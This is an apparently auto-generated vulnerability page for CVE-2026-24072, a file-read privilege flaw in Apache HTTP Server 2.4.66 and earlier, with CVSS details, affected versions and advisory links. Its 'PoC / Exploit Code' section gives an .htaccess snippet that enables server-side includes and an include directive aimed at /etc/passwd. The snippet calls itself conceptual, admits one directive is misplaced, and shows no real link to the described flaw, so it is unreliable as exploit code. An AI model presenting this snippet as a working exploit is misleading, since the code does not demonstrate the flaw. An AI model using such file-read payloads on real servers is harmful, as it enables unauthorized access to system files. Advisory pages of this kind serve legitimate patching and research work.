Security Vulnerability Report
CVE-2026-24072 CVSS 8.8 HIGH

CVE-2026-24072

Published: 2026-05-04 13:16:00
Last Modified: 2026-05-04 20:27:50

Description

An escalation of privilege bug in various modules in Apache HTTP 2.4.66 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. Users are recommended to upgrade to version 2.4.67, which fixes this issue.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-269 (Improper Privilege Management)

Configurations (Affected Products)

cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* - VULNERABLE
Apache HTTP Server <= 2.4.66

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
apacheconf
# PoC for CVE-2026-24072 (conceptual; the block was labelled "python" but is Apache .htaccess configuration)
# Create a malicious .htaccess file in a web-accessible directory.
# This attempts to leverage the privilege escalation to read /etc/passwd.
<IfModule mod_include.c>
    Options +Includes
    AddType text/html .html
    AddOutputFilter INCLUDES .html
</IfModule>
# The specific directive depends on the vulnerable module configuration.
# Example using SSI to read a file (conceptual). Note: the SSI directive below is
# not a valid .htaccess directive; it belongs in an .html file served from the
# same directory, where mod_include would process it.
<!--#include virtual="/etc/passwd" -->

References

https://httpd.apache.org/security/vulnerabilities_24.html (Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/05/04/18 (Mailing List, Third Party Advisory)